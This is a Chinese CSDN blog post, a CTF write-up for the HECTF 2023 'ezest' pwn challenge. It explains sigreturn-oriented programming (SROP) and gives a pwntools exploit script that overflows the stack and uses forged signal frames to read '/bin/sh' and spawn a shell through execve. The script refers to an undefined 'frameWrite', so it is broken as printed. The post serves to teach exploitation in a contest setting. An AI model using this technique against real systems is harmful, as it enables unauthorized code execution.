2023 第七届 HECTF 信息安全挑战赛ezest

最新推荐文章于 2024-05-31 19:00:00 发布
最新推荐文章于 2024-05-31 19:00:00 发布
阅读量94 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dangwobucunzai/article/details/134561386
版权

分析

函数分析

通过ida可以找到题目给了一个gadget

.text:000000000040110A 55                            push    rbp
.text:000000000040110B 48 89 E5                      mov     rbp, rsp
.text:000000000040110E 48 C7 C0 00 00 00 00          mov     rax, 0
.text:0000000000401115 48 C7 C7 00 00 00 00          mov     rdi, 0                          ; fd
.text:000000000040111C 48 8D 75 F0                   lea     rsi, [rbp+buf]                  ; buf
.text:0000000000401120 48 C7 C2 00 02 00 00          mov     rdx, 200h                       ; count
.text:0000000000401127 0F 05                         syscall                                 ; LINUX - sys_read
.text:0000000000401129 C3                            retn

从main函数中可以看到这里使用了syscall,而syscall在调用哪个函数在此处是由rax的值决定的,溢出点可以确定在main函数的read中,偏移是0x10

.text:0000000000401131 F3 0F 1E FA                   endbr64
.text:0000000000401135 55                            push    rbp
.text:0000000000401136 48 89 E5                      mov     rbp, rsp
.text:0000000000401139 48 C7 C0 0F 00 00 00          mov     rax, 0Fh
.text:0000000000401140 C3                            retn

在gadget中可以看到有一个 mov rax,0Fh ,在syscall中,rt_sigreturn的系统调用号就是0Fh,到这里可以大致确定使用的是srop

srop背景

在 UNIX 和类 UNIX 系统中,当一个程序接收到信号(如 SIGINT 或 SIGSEGV)时,操作系统会暂停当前的程序执行,保存程序的上下文(包括所有寄存器的状态),然后跳转到信号处理函数。一旦信号处理完成,rt_sigreturn 系统调用被用来恢复保存的程序上下文,并继续执行原程序。

SROP 攻击概述

SROP 攻击利用 rt_sigreturn 来控制程序的执行流程。这种攻击的关键在于构造一个伪造的信号帧(包含寄存器的状态),然后通过程序中的漏洞(如栈溢出)引导程序执行 rt_sigreturn,从而使操作系统恢复这个伪造的信号帧。

解题

流程

1. 构造信号帧

攻击者首先构造一个伪造的信号帧,这个帧包含了被恢复的所有寄存器的值,包括程序计数器(PC)、栈指针(SP)等。

2. 触发 rt_sigreturn

通过某种方式(例如栈溢出)将程序的执行流程引导到 syscall 指令,并使得相应的寄存器设置为 rt_sigreturn 的系统调用号。

3. 利用恢复的上下文执行代码

当 rt_sigreturn 被调用时,它将从伪造的信号帧中恢复寄存器状态,包括 PC。这允许攻击者控制程序接下来的执行流程。

思路

首先让栈溢出,使其溢出到mov rax,0Fh(在gadget中),然后使其retn之syscall,至此就可以完成rt_sigreturn的调用,接着构造一个信号帧,使用pwntool中的SigreturnFrame(),信号帧中设置好寄存器的值,此处未想到其他‘/bin/sh’字符串的来源,故此处使用read函数读取‘/bin/sh’,将字符串存至bss段中,接着再返回之syscall中调用execve函数

exp

from pwn import *

sh=remote('',)

syscallAddr=0x401127

elf=ELF('./pwn11')
gadgetAddr=0x401139

binshStr=elf.bss(0)
rspAddr=elf.bss(8)

context.arch = "amd64"
frameRead = SigreturnFrame()
frameRead.rax = 0 
frameRead.rdi = 0
frameRead.rsi = binshStr
frameRead.rdx = 0x1000
frameRead.rip = syscallAddr
frameRead.rsp = rspAddr

payload=b'A'*16+p64(gadgetAddr)+p64(syscallAddr)+bytes(frameWrite)

sh.send(payload)

frameExecve = SigreturnFrame()
frameExecve.rax = 59  # execve 系统调用号
frameExecve.rdi = binshStr 
frameExecve.rsi = 0 
frameExecve.rdx = 0 
frameExecve.rip = syscallAddr 
frameExecve.rsp = rspAddr

payload1=b'/bin/sh\x00'+p64(gadgetAddr)+p64(syscallAddr)+bytes(frameExecve)

sh.send(payload1)

sh.interactive()
江上一尘
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HECTF2021-0kam1-wirteup.pdf
11-16
HECTF2021-0kam1-wirteup.pdf
练习流量分析DAY8 [2023HECTF_ezpcap]
qq_63574533的博客
11-19 173
加油加油加油QWQ!!!!!!!!
[CTF]-HECTF2021部分复现
Mr.木Mu
05-23 1174
HECTF2021部分复现MISC快来公众号yaJamesHarden捉迷藏迷途的狗狗snakeCRYPTO签到encodeRSA_e_nre_rsaLittleRSAWebmmmmd5d5d5d5EDGnb(签到)时光塔的宝藏ez_pyLFI_RCE反序列化总结 MISC 快来公众号ya 关注公众号回复即可 JamesHarden 拖到010 PK开头 修改拓展名.rar 解压文件拖进010发现变异flag URPGS{Jr1p0zr_G0_U3pg6_!} 凯撒解密 位移13 HECTF{We1
【wp】2023第七届HECTF信息安全挑战赛 Web
m0_63138919的博客
11-19 647
本文为【wp】2023第七届HECTF信息安全挑战赛 Web
2023 第七届 HECTF 信息安全挑战赛signin
dangwobucunzai的博客
11-22 106
本题主要是要让程序执行到b4ckdo0r函数,但是需要在函数中满足输入的数值大于3和等于0x42此题关键点在LODWORD(v4[0]),主要是LODWORD(**是一个在编程中用来从更大的整数类型中提取低位部分(低阶双字)的宏或函数。通常用于从 64 位整数(如或)中提取低 32 位,以得到一个(即)类型的值。),我们输入的是64位的数据,比对需要小于3的时候使用的是64位的数据,但是在比对是否位0x42时,使用的是低32位的数据。
HECTF2023
qq_74035288的博客
03-11 517
公众号发即可获得flag。
萌新的第一场CTF——HECTF
mumuzi的博客
11-25 3023
第一次打真正意义上的CTF比赛 之前有名必报,之后发现只会做签到 祥云杯也就康康就走了 这几天看了知乎的大佬,只学了3个月都能拿30名,而我只能拿75感觉有点捞 所以我就把我能做起的WP给大家分享一下 MISC 1.png: 对于图片题,最简单的要有几种思想:1.属性,2.winhex头尾,3.图片高度,4.stegsolve,5.foremost,6.LSB隐写。 这道题后用winhex打开后,发现文件尾有base64编码:M2I3OWJkZjhmY2ZkNTVmZH0= 解码得到:3b79bdf8fc
HECTF2022
mumuzi的博客
11-08 2954
今年是第三次参加HECTF,成绩不是很好wp随便看看就好了 文章目录Misc咦~小鲨鱼来喽舞者的秘密你把我flag藏哪去了?来玩捉迷藏呀我的手要不行辣2022HECTF调查问卷Crypto流动的音符matrixezrsamixtureReverseapk贝斯helloiosrunWeb迷路的小狮擎天注Pwn真·签到 Misc 咦~小鲨鱼来喽 直接打开流量包翻tcp流量即可 HECTF{i0hate0flow0analysis896} 舞者的秘密 直接爆破压缩包得到密码为456123,接着用GIFFram
接第一篇博客:fw的第二场CTF——HECTF2021 WP
mumuzi的博客
11-15 2246
第一篇博客,第一次参加比赛https://blog.csdn.net/qq_42880719/article/details/110139040就是HECTF 所以这HECTF我非打不可了 想当年,刚接触拿了75名。原来HECTF是那么亲民。 现在接触CTF已经一年 了(虽然正式开始搞是在刚放寒假的几天) 得来检验检验一下了 HECTF yyds!!!(毕竟去年抽奖中了贴纸 ) 入坑了入坑了。 BUT今年感觉乐趣倒是少了一点,不知道为什么。 但还是很好玩的!!!而且一直奖励丰富,题目亲民,好耶! Misc
登录安全分析报告:小米官网注册
Explinks的博客
05-29 940
图形验证及交互验证方式的安全性到底如何?请看具体分析。
导线防碰撞警示灯:高压线路安全保障
dxzhkj888888的博客
05-30 280
同时,警示灯的反光材料也起到了至关重要的作用,无论是白天还是夜晚,都能将光线反射到最远的距离,让警示效果倍增。导线防碰撞警示灯也叫高压线太阳能警示灯、户外高压线路夜间红色闪光灯,以其独特的设计和卓越的性能,成为了电力安全领域的保障。在广袤的大地上,高压线路如同血脉般纵横交错,然而,在这看似平静的电力输送背后,却隐藏着不容忽视的安全隐患。而到了夜晚,警示灯便开始了它的使命。导线防碰撞警示灯的出现,使得那些驾驶超高车辆、操作超高施工机械的司机们,也在警示灯的提醒下,更加谨慎地行驶和操作,避免了可能发生的危险。
网络学习(九)|深入解析Cookie与Session:高级应用及安全实践
weixin_44435110的博客
05-28 675
通过本以上,后端开发人员可以深入了解Cookie和Session的高级应用、常见问题及其解决方案,有助于设计和实现高效、安全的会话管理系统。
内网安全-隧道搭建&穿透上线&内网穿透-nps自定义上线&内网渗透-Linux上线-cs上线Linux主机
rumil的博客
05-28 1510
nps内网穿透工具是一款轻量级、高性能、功能强大的内网代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用于访问内网网站、支付本地接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等……,并带有功能强大的web管理端。一个轻量级、高性能、强大的内网穿透代理服务器,带有强大的web管理端。 内网渗透-CS上线Linux主机-Linux上线
如何在OrangePi AIpro智能小车上实现安全强化学习算法
越努力,越幸运!
05-28 2642
无人驾驶试点——守住安全底线
goodxianping的专栏
05-27 357
更让人担忧的是,在一些企业急功近利的营销攻势下,过度包装自动驾驶技术的成熟度,“美化”技术缺陷,出现了安全隐患被人为掩盖,驾驶者放松警惕,甚至对无人驾驶出现错误认知而引发的安全事故。比如,在保障运输安全的前提下,鼓励在封闭式快速公交系统等场景使用自动驾驶汽车从事城市公共汽(电)车客运经营活动,在交通状况简单、条件相对可控的场景使用自动驾驶汽车从事出租汽车客运经营活动,在点对点干线公路运输、具有相对封闭道路等场景使用自动驾驶汽车从事道路普通货物运输经营活动。同时,对自动驾驶汽车安全使用也提出了新的要求。
安全风险 - 检测设备是否为模拟器
最新发布
Android、前端、小程序、后端
05-31 378
在很多安全机构的检测中,关于模拟器的运行环境一般也会做监听处理,有的可能允许执行但是会提示用户,有的可能直接禁止在模拟器上运行我方APP可能做 Framework 的朋友思维会更开阔一些,不过现在也可以跟我这门外汉一起来稍微了解下。
场外个股期权零门槛开户安全吗?
qiquanjiang的博客
05-30 508
一般来说场外个股期权是需要5000w门槛验资20个交易日的,但门槛对于大多数散户而言是很难达到的,因此场外个股期权零门槛开户因此产生,个人散户参与场外个股期权可以通到机构通道方直接下单交易,下文为大家揭秘场外个股期权零门槛开户安全吗?不知道大家听说过“自有盘”没有,我们在进行期权零门槛开户最怕遇到的就是自有盘,因此这种平台会想尽切办法让投资者亏损从而达到赚钱的目的。此外,场外个股期权零门槛虽然提供了便利,但投资者仍应充分了解期权交易的相关规则和风险,制定合理的投资策略,并控制仓位和杠杆,避免过度交易。
如何获取SSL证书,消除网站不安全警告
u012062803的博客
05-31 382
验证通过后,CA会颁发SSL证书给你,通常包括主证书、中间证书(证书链)和私钥。按照你的服务器类型(如Apache、Nginx、IIS等)的指南,将这些文件安装到你的服务器上。CSR中包含了你的公钥和一些关于你的基本信息。如果你寻求免费选项,如阿里云、JoySSL等提供免费的DV(域名验证)SSL证书,但可能有使用期限或功能限制。对于更高安全级别的证书(如OV企业型或EV增强型),CA可能要求额外的身份验证信息,比如企业信息等。确保在整个过程中遵循CA的具体指示,因为不同的CA和证书类型可能有细微的差别。
守护景区安全:探讨景区视频监控方案的搭建及必要性
TSINGSEE青犀视频官方技术博客
05-28 1087
视频监控EasyCVR平台支持视频录像、存储、回放等功能,在景区发生意外情况时,可通过调阅视频录像查看现场事发经过,将视频录像作为追溯责任的证据。
内网安全--域渗透准备知识
金灰的博客
05-22 929
通过域成员主机,定位出域控制器 IP 及域管理员账号,利用 域成员主机作为跳板,扩大渗透范围,利用域管理员可以登陆域中任何成员主机的特性, 定位出域管理员登陆过的主机 IP,设法从域成员主机内存中 dump 出域管理员密码,进 而拿下域控制器、渗透整个内网.某个域用户需要使用 viso 软件进行绘图操作,于是联系网络管理员进行安装,网络管理 员采用域管理员身份登录了域成员主机,并帮助其安装了 viso 软件,于是这个有计算机 基础的员工,切换身份登录到了本地计算机的管理员,后执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值